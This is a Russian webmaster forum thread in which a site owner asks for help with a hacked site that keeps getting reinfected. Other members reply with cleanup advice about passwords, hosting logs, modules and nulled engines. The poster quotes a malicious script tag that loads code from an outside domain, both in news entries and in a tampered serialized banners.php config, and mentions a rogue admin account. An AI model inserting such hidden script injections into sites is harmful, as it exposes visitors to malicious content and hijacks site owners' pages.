- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Нифега не пойму что мне айболит показывает. Просидел пять часов, вроди всё убрал тут бах в 23-00 опять появился не знаю что делать у меня мало опыта в этом. Если есть у кого желание поглядеть проблему и помочь буду очень признателен.
Нифега не пойму что мне айболит показывает. Просидел пять часов, вроди всё убрал тут бах в 23-00 опять появился не знаю что делать у меня мало опыта в этом. Если есть у кого желание поглядеть проблему и помочь буду очень признателен.
Айболит дырки в скриптах не лечит. Искренне Ваш, Кэп.
Ды вот.
Делаю полную проверку айболитом, нужно найти где сидит. а то сейчас после 24 пор.уха полезет.
Пароли к хостингу, фтп, бд меняли? На компьютере антивирус стоит? Логи хостинга смотрели? Дополнительные модули стоят на сайте?
Пароли к хостингу, фтп, бд меняли? На компьютере антивирус стоит? Логи хостинга смотрели? Дополнительные модули стоят на сайте?
Пароли менял, фтп, бд менял, на компе nod32? (Логи хостинга смотрели? - Список действий в админпанели это имеете ввиду? - там ничего все входы с моего IP ) да пару модудей есть.
История такая. Всё было около года нормально. недавно где то неделю, может две, Захожу с другого браузера на сайт а там всё в пор.нухе, блин начал копать нашол в краткой и полной новости вот это:
[group=4,5]<script language='javascript' charset='UTF-8' type='text/javascript' src='http://ppadman.ru/5s5nppui13q7xpgehmd8usu1ssrzot1'></script>[/group]
Удалил.
Спустя пару дней, Работаю под своим профилем, бах смотрю появляется какой то второй админ что то типа (pod056 или comd0089) точно не помню, не до этого было. Сразу в лог действий кинулся там ничего, потом по пользователям начал искать нету. и после появился скрипт, но работает только когда я выхожу из профиля и в краткой новости.
Пока спасаюсь заменой engine, но при этом не могу войти в профиль админа а то снова выскочит.
Тут вот в чём засада:
Нормальный banners.php
a:1:{i:1;a:13:{s:2:"id";s:1:"1";s:10:"banner_tag";s:6:"header";s:5:"descr";s:14:"Верхний баннер";s:4:"code";s:199:"<div align="center"><a href="http://www.mid-team.ws/" title="M.I.D Team" target="_blank"><img src="http://сайт/templates/Default/images/_banner_.gif" style="border: none;" alt="" /></a></div>";s:7:"approve";s:1:"1";s:11:"short_place";s:1:"0";s:6:"bstick";s:1:"0";s:4:"main";s:1:"0";s:8:"category";s:1:"0";s:10:"grouplevel";s:3:"all";s:5:"start";s:0:"";s:3:"end";s:0:"";s:5:"fpage";s:1:"0";}}
А вот что происходит когда я выхожу из своего аккаунта профиля или время подходит:
a:2:{i:1;a:13:{s:2:"id";s:1:"1";s:10:"banner_tag";s:6:"header";s:5:"descr";s:14:"Верхний баннер";s:4:"code";s:199:"<div align="center"><a href="http://www.mid-team.ws/" title="M.I.D Team" target="_blank"><img src="http://сайт/templates/Default/images/_banner_.gif" style="border: none;" alt="" /></a></div>";s:7:"approve";s:1:"1";s:11:"short_place";s:1:"0";s:6:"bstick";s:1:"0";s:4:"main";s:1:"0";s:8:"category";s:1:"0";s:10:"grouplevel";s:3:"all";s:5:"start";s:0:"";s:3:"end";s:0:"";s:5:"fpage";s:1:"0";}i:2;a:13:{s:2:"id";s:1:"2";s:10:"banner_tag";s:6:"center";s:5:"descr";s:10:"centerclic";s:4:"code";s:134:"<script language='javascript' charset='UTF-8' type='text/javascript' src='http://ppadman.ru/5s5nppui13q7xpgehmd8usu1ssrzot1'></script>";s:7:"approve";s:1:"1";s:11:"short_place";s:1:"7";s:6:"bstick";s:1:"1";s:4:"main";s:1:"0";s:8:"category";s:1:"0";s:10:"grouplevel";s:3:"4,5";s:5:"start";s:0:"";s:3:"end";s:0:"";s:5:"fpage";s:1:"0";}}
Что делать где его искать непонятно, если можешь что подсказать буду признателен!
Написал целое объяснение но что то оно не появилось.
В краце.
Пароли к хостингу, фтп, бд меняли? На компьютере антивирус стоит? Логи хостинга смотрели? Дополнительные модули стоят на сайте?
пароли менял, фТп, бд менял, на компе NOD32, Логи в смысле (Список действий в админпанели) смотрел без изменений. Пару модулей стоит.
Проверьте модули, логи хостинга смотрите, а не движка.
А где смотреть логи хостинга?
проблема тупо в:
1. нулленый движок
2. левые моды, хаки
от них все беды
выход, купить и/или найти лицензионный исходник )
Может нам это через icq или скайп связатся?